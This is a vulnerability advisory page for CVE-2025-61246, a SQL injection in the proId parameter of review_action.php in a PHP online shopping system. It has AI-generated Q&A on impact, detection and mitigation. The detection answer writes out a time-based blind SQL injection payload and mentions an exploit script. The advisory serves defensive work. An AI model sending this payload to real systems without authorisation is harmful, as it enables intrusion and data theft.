CVE-2025-61246
BaseFortify
Publication date: 2026-01-08
Last updated on: 2026-01-16
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| indieka900 | online_shopping_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-61246 is a critical SQL Injection vulnerability in version 1.0 of the indieka900 online-shopping-system-php application. It occurs in the review_action.php file via the proId parameter, which is directly embedded into SQL queries without proper sanitization or parameterization. This allows attackers to inject malicious SQL code remotely, enabling them to extract sensitive data, bypass authentication, modify or delete records, and potentially execute administrative operations or remote code execution. [1]
How can this vulnerability impact me? :
Successful exploitation of this vulnerability can lead to severe impacts including data breaches involving user information, credentials, and payment data. Attackers can bypass authentication mechanisms, manipulate or delete database records, and potentially gain full system compromise including remote code execution under certain configurations. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by performing time-based blind SQL injection tests on the proId parameter in the master/review_action.php endpoint. An example payload to test is: proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -. You can use the provided automated Python exploitation script (exploit.py) from the PoC repository to detect and exploit the vulnerability. Manual testing instructions are also available in the MANUAL_TESTING.md file. Commands would involve sending crafted POST requests with the payload to the vulnerable endpoint and measuring response delays to confirm the vulnerability. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing strict input validation on all user inputs, replacing dynamic SQL queries with parameterized prepared statements (e.g., using prepared statements with bound parameters for the proId parameter), deploying Web Application Firewall (WAF) rules to block SQL injection attempts, and applying the latest security patches to the application. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows attackers to extract sensitive data such as user information, credentials, and payment data, which can lead to data breaches. Such breaches can result in non-compliance with data protection regulations like GDPR and HIPAA, which mandate the protection of personal and sensitive information. Therefore, exploitation of this SQL Injection vulnerability can negatively impact compliance with these standards by exposing protected data. [1]